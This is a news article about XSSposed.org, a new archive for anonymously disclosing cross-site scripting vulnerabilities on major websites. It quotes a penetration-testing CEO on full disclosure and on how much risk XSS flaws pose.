A new online archive is gaining popularity among security researchers as a go-to source to anonymously submit cross-site scripting vulnerabilities uncovered from across the Web. In less than two weeks, the site has amassed enough reported vulnerabilities to cast doubt on the security of dozens of high-profile companies' websites.
Having only received its first confirmed submission on June 18, XSSposed.org has tallied more than 300 confirmed cross-site scripting (XSS) vulnerabilities across hundreds of sites since its inception.
A typical submission provides the vulnerable URL, information on when the vulnerability was verified by the site's as-yet-unnamed administrators, whether the flaw has been fixed since it was first disclosed and the Google and Alexa rankings of the vulnerable domain.
Those rankings are used to sort submissions by the popularity of the Web domains. Familiar Web properties like Forbes.com, WashingtonPost.com and Bloomberg.com showing up near the top of the most heavily trafficked sites found to be susceptible to XSS attacks. Domains owned by companies like Toyota and Corsair, as well as prominent higher education institutions like the University of Cambridge and Harvard University, are also purportedly exposed.
XSSposed.org takes much of its impetus from the now-defunct XSSed.org -- an online archive that until recently had collected XSS vulnerabilities -- though the new site promises researchers complete anonymity if they desire, in the hopes that it will facilitate full disclosure.
"Submissions can be done anonymously -- all our logs are regularly deleted -- or under security a researcher's nickname or even real name," said the XSSposed.org website. "For security researchers, XSSposed is a safe place to report an XSS vulnerability and gain public recognition/credit, while for website owners and administrators; it's an up-to-date source of information to keep their websites safer."
Ilia Kolochenko, CEO of Swiss penetration testing and forensics firm High-Tech Bridge SA, said that he fully supported the site's mission to publically expose XSS vulnerabilities.
Kolochenko said that he has disclosed security bugs to large organizations that tout their information security programs, but often either received no response at all, or a response that suggested fixing security vulnerabilities wasn't a priority for the organization. Those responses, he noted, tended to change dramatically when a media organization publicizes vulnerabilities.
"Usually, you notify a company and two weeks after, they ignored it and didn't reply," said Kolochenko. "As soon as the information appears somewhere online, 24 hours after, the vulnerability has typically been patched."
As for whether the cross-site scripting flaws listed on the site pose an immediate threat, Kolochenko said that his company tends to rate XSS -- a long-time staple of the OWASP top 10 Web application vulnerability list -- as a "medium-risk" vulnerability. As opposed to SQL injection vulnerabilities that can be used to compromise a site remotely, he added, such attacks rely on manipulating a user into clicking a maliciously crafted link.
The rewards of exploiting an XSS vulnerability also vary for attackers, Kolochenko said -- so patrons of an online store may have their accounts exposed via a cross-site scripting attack if they click on a malicious URL, but similar vulnerabilities on other sites may not be nearly as fruitful.
Still, Kolochenko said that the companies with unaddressed vulnerabilities on the site should focus on fixing the problems in a timely fashion -- particularly the infosec-oriented organizations. He noted that two of the domains with the most vulnerabilities listed belong to Kaspersky, the Russia-based antimalware giant, and InfoSec Institute, an organization that provides training on a variety of security areas and certifications.
Update: A Kaspersky spokesperson said after publication that the XSS vulnerabilities on the website have now been addressed, and that has been confirmed on XSSposed.org.
While those organizations may not be focused specifically on Web security, and similar problems likely exist at many other security organizations, Kolochenko said that such companies ignoring long-known issues on their sites sends the wrong message.
"They are an important part of information security industry and they should care about every aspect of information security, including their own Web sites and applications," said Kolochenko, "because if even they show they don't really care about the security of their sites, some organizations can say 'Even these big companies in information security have XSS vulnerabilities. Why should we care?' It gives the wrong impression that some parts of information security can be ignored or underestimated."
Kolochenko added, "This site might finally make people think about information security that up until today I would say many big companies almost ignored."